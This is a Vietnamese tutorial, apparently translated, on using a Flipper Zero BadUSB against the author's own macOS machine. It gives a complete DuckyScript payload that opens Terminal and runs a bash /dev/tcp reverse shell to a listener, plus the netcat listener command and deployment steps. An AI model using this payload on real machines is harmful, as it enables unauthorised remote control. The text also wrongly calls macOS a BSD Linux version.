Bằng cách sử dụng Flipper Zero, một tệp văn bản DuckyScript ngắn 12 dòng và một trình nghe từ xa trên máy chủ Ubuntu của mình, tôi đã có thể có được trình bao trên máy tính macOS Ventura cập nhật, được vá đầy đủ của mình. Trong môi trường phòng thí nghiệm của mình, tôi sử dụng Flipper Zero như một thiết bị dồn nén để kiểm tra các lỗ hổng trong máy chủ và hệ thống máy tính để bàn của mình. Flipper Zero là công cụ hack đạo đức ưa thích của chúng tôi vì nó cung cấp vô số tải trọng có sẵn, có công cụ chọn menu trên màn hình và sử dụng màn hình tiến trình để cung cấp phản hồi. Bài viết này là một ví dụ về cách sử dụng Flipper Zero như một thiết bị BadUSB kiểm tra đạo đức và cách tránh trở thành nạn nhân của việc khai thác như vậy. Không sử dụng điều này trên các máy tính mà bạn không sở hữu hoặc không được phép sử dụng. Mã này không cố gắng che giấu khỏi Hệ thống Phát hiện Xâm nhập (IDS), Hệ thống Ngăn chặn Xâm nhập (IPS), Hệ thống Phát hiện Mạng, Tường lửa hoặc phần mềm Chống Vi-rút (AV). Tải trọng BadUSB Flipper Zero BadUSB cũng như một số thiết bị BadUSB khác sử dụng tải trọng được viết bằng DuckyScript. Một ngôn ngữ kịch bản đơn giản để thực hiện thao tác gõ phím dẫn đến một cuộc tấn công tiêm nhiễm bàn phím. Một điểm khởi đầu tốt cho Tải trọng Duckyscript là trang web chính thức của Hak5: . Tại đây, bạn sẽ tìm thấy các ví dụ và tài liệu về cách sử dụng DuckScript. https://shop.hak5.org/blogs/payloads/tagged/usb-rubber-ducky Hãy viết một số DuckyScript Bạn có thể sử dụng tập lệnh được tạo sẵn hoặc bạn có thể học cách viết của riêng mình. Chúng tôi sẽ chỉ cho bạn cách khai thác trình bao đảo ngược trên máy tính macOS theo hướng dẫn từng bước đơn giản. Sử dụng trình soạn thảo văn bản yêu thích của bạn và nhập văn bản sau. MacOS có ứng dụng TextEdit được cài đặt theo mặc định, vì vậy chúng tôi sẽ sử dụng ứng dụng đó. ID 05ac:021e Apple:Keyboard DELAY 1000 GUI SPACE DELAY 200 STRING terminal DELAY 200 ENTER DELAY 1000 STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1 DELAY 1000 ENTER DELAY 1000 Đối với hướng dẫn này, chúng ta không cần biết nhiều về DuckyScript, vì vậy chúng ta sẽ xem qua một số lệnh mà tập lệnh của chúng ta sử dụng. Thực sự chỉ có năm lệnh khác nhau mà chúng tôi sử dụng. Yêu cầu Sự mô tả ID 05ac:021e Apple:Bàn phím Dòng này cho macOS biết Flipper Zero của chúng tôi thực sự là Bàn phím Apple. Nếu bạn không sử dụng dòng này, macOS sẽ hiển thị hộp thoại Hỗ trợ thiết lập bàn phím, điều này sẽ khiến tập lệnh của bạn không thành công. SỰ CHẬM TRỄ Lệnh này hướng dẫn hệ điều hành đợi trong một khoảng thời gian. Nếu chúng tôi không sử dụng những độ trễ này, tập lệnh sẽ chạy quá nhanh và không thành công. KHÔNG GIAN GUI Nhấn phím Apple Command và thanh Dấu cách để mở cửa sổ 'Tìm kiếm Spotlight'. Nhà ga STRING Nhập chuỗi 'Terminal' vào cửa sổ Tìm kiếm Spotlight ĐI VÀO Nhấn phím ENTER hoặc Return trên bàn phím của bạn. Sau khi nhấn phím ENTER, macOS sẽ khởi chạy cửa sổ Terminal (/Applications/Utilities/Terminal) CHUỖI bash -i >& /dev/tcp/10.10.10.157/4444 0>&1 Lệnh này nhập văn bản vào cửa sổ đầu cuối để thiết lập kết nối với máy chủ Netcat đang nghe tại 10.10.10.157 trên Cổng 4444 Thay đổi địa chỉ IP tại và Cổng thành địa chỉ IP và cổng của máy chủ của bạn. 10.10.10.157 4444 Lưu tệp này vào đĩa của bạn dưới dạng . Không có tổ chức thư mục con nào trong thư mục trên Flipper Zero, vì vậy nếu bạn đang sử dụng nhiều tải trọng cho các hệ điều hành khác nhau, hãy sử dụng quy ước đặt tên có ý nghĩa gì đó đối với bạn để bạn biết nó làm gì. rev_shell_macos.txt badusb Cài đặt ứng dụng qflipper Nếu bạn chưa cài đặt ứng dụng qflipper, hãy truy cập trang cập nhật Chính thức của Flipper Zero và chọn trình cài đặt cho hệ điều hành của bạn. Trang này là trang cập nhật chương trình cơ sở, nhưng ở dưới cùng là các liên kết để cài đặt ứng dụng qflipper. https://flipperzero.one/update https://flipperzero.one/update?embedable=true Làm theo hướng dẫn dành cho hệ điều hành của bạn để cài đặt ứng dụng qflipper. Bắt Duckyscript lên Flipper Zero Mở ứng dụng qflipper và chọn biểu tượng thư mục được đánh dấu màu đỏ. Chọn và nhấp đúp vào biểu tượng để xem nội dung. Thẻ SD Xác định vị trí và kéo tệp mà chúng tôi đã tạo trước đó vào thư mục . rev_shell_macos.txt badusb Tháo Flipper Zero khỏi máy tính của bạn khi sao chép xong tệp. Chờ đợi một Shell đảo ngược Flipper Zero BadUSB được trang bị và sẵn sàng sử dụng. Nhưng trước tiên, chúng ta cần thiết lập trình nghe từ xa trên máy chủ của mình. Trên máy chủ Ubuntu của chúng tôi, hãy khởi động trình nghe Netcat bằng lệnh sau: $ nc -nlvp 4444 Sự cố của lệnh được liệt kê trong bảng sau. Một lần nữa, bạn không thực sự cần biết điều gì đang xảy ra khi sử dụng lệnh này, ngoài việc nó đang chờ kết nối đến. Yêu cầu Tùy chọn nc lệnh netcat -nlvp ( ) không có độ phân giải DNS, ( ) lắng nghe kết nối đến, ( ) đầu ra chi tiết, ( ) cổng n l v p 4444 Số cổng để nghe trên Giờ đây, trình nghe Netcat của chúng ta đã sẵn sàng và đang chờ kết nối đến, chúng ta có thể tiến hành cuộc tấn công Flipper Zero BadUSB. Khởi động BadUSB Reverse Shell Phần khó khăn đã xong. Tệp Flipper Zero BadUSB được ghi, chuyển sang Flipper Zero và trình nghe Netcat đang chờ kết nối. reverse_shell_macos.txt Xác định vị trí menu Bad USB và chọn nút Run. Chưa kết nối Flipper Zero với máy tính của bạn. Flipper Zero sẽ cho bạn biết khi nào nên kết nối thiết bị của mình. Điều hướng đến tệp DuckyScript mà chúng tôi đã sao chép ở bước trước. Nếu bạn không thấy tệp này thì bạn đã sao chép nó vào thư mục sai. Chọn và nhấp vào nút Chạy. rev_shell_macos Khi thấy cảnh báo , bạn có thể kết nối Flipper Zero với cổng USB của iMac hoặc MacBook. Nhấp vào nút Chạy. Kết nối với USB Bạn có thể xem tiến trình của tập lệnh BadUSB trong cửa sổ chính. Khi trạng thái đạt 100%, tải trọng đã hoàn tất và bạn có thể gỡ bỏ Flipper Zero. Nếu bạn đang xem màn hình máy tính của iMac, bạn có thể thấy cách khai thác khi nó thực thi DuckyScript. Trình nghe Netcat trên máy chủ Ubuntu của chúng tôi hiển thị kết quả của yêu cầu thành công. Kiểm soát máy tính của bạn Bây giờ bạn có quyền kiểm soát máy tính macOS thông qua trình bao đảo ngược. Chạy trên phiên bản BSD Linux, bạn có thể sử dụng các công cụ dòng lệnh Unix và trình bao BASH như thể bạn đang ngồi trên bàn phím vật lý của iMac. Bạn có thể sử dụng các lệnh Linux thông thường như , , hoặc để điều hướng hệ thống tệp và thao tác với hệ điều hành. whoami pwd ls cd Bước tiếp theo Bây giờ bạn đã hiểu về cách Flipper Zero hoạt động như một thiết bị BadUSB, bạn có thể tạo tập lệnh của riêng mình. Sử dụng trang web Hak5 hoặc một trong nhiều kho DuckyScript GitHub có sẵn thông qua tìm kiếm trên Google làm điểm bắt đầu cho các tệp Duckyscript của riêng bạn. Hoạt động hợp pháp và có đạo đức. Sử dụng công cụ này trên các thiết bị mà bạn sở hữu hoặc có quyền sử dụng.
